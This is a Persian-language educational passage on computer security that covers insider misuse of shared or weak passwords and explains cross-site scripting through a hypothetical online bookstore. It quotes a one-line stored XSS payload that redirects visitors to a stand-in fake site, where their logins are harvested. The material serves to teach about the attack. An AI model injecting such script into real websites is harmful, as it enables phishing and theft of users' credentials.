امنیت کامپیوتر قسمت چهاردهم
این بدان معناست که هر کسی در شبکه می تواند به آن داده ها دسترسی داشته باشد. در چنین موردی جرمی مرتکب نشده است. با این حال، در موارد دیگر، کارکنان به طور هدفمند اقدامات امنیتی را برای دسترسی به داده هایی که مجاز به استفاده از آنها نیستند دور می زنند. رایج ترین روش این است که به سادگی با رمز عبور شخص دیگری وارد شوید. این امر به مرتکب امکان دسترسی به منابع و دادههایی را میدهد که به آن شخص دیگر اجازه دسترسی داده شده است. متأسفانه بسیاری از افراد از رمزهای عبور ضعیف استفاده می کنند یا بدتر از آن، رمز عبور خود را در جایی روی میز خود می نویسند. برخی از کاربران حتی رمز عبور را به اشتراک می گذارند. به عنوان مثال، فرض کنید یک مدیر فروش مریض است اما می خواهد بررسی کند که آیا مشتری به او ایمیل زده است یا خیر.
بنابراین او با دستیار خود تماس می گیرد و ورود خود را به او می دهد تا بتواند ایمیل او را بررسی کند. این نوع رفتار باید به شدت توسط سیاست های امنیتی شرکت ممنوع شود، اما هنوز هم رخ می دهد. مشکل این است که اکنون دو نفر ورود مدیر فروش را دارند. هر یک می تواند از آن استفاده کند یا آن را برای شخص دیگری فاش کند (به طور تصادفی یا عمدی). بنابراین احتمال بیشتری وجود دارد که شخصی از لاگین آن مدیر برای دسترسی به داده هایی استفاده کند که مجاز به دسترسی به آنها نیست.
اسکریپت بین سایتی
این حمله ارتباط نزدیکی با تزریق SQL دارد. همچنین شامل وارد کردن داده هایی غیر از آنچه در نظر گرفته شده است میشود، و بستگی به این دارد که برنامه نویس وب ورودی را فیلتر نکند. مرتکب قسمتی از وب سایت را پیدا می کند که به کاربران اجازه می دهد متنی را تایپ کنند که سایر کاربران می بینند و سپس اسکریپت سمت مشتری را در آن فیلدها تزریق می کند.
توجه داشته باشید
قبل از اینکه این جنایت خاص را توصیف کنم، باید اشاره کنم که خرده فروشان آنلاین عمده مانند eBay و Amazon.com در معرض این حمله نیستند. آنها ورودی کاربر را فیلتر می کنند.
برای درک بهتر این فرآیند، اجازه دهید به یک سناریوی فرضی نگاه کنیم.
بیایید فرض کنیم که فروش آنلاین کتاب ABC یک وب سایت دارد.
علاوه بر خرید، کاربران میتوانند حسابهایی با کارتهای اعتباری ذخیره شده، ارسال نظرات و موارد دیگر داشته باشند.
مهاجم ابتدا یک صفحه وب جایگزین ایجاد می کند که تا حد امکان به صفحه واقعی نزدیک به نظر می رسد.
سپس مهاجم به وب سایت واقعی فروش کتاب آنلاین ABC می رود و یک کتاب نسبتاً محبوب پیدا می کند.
او به بخش بررسی میرود، اما بهجای تایپ یک نقد، تایپ میکند:
<script> window.location = “http://www.fakesite.com”; </script>
اکنون وقتی کاربران به آن کتاب می روند، این اسکریپت آنها را به سایت جعلی هدایت می کند، که بسیار شبیه سایت واقعی است. سپس مهاجم میتواند از وبسایت بخواهد به کاربر بگوید که زمان سشن او به پایان رسیده است و لطفاً دوباره وارد شوید. این به مهاجم اجازه می دهد تا حساب ها و رمزهای عبور زیادی را جمع آوری کند. این تنها یک سناریو است، اما حمله را نشان می دهد. #####7
ربودن سشن
قوانین ارسال دیدگاه در سایت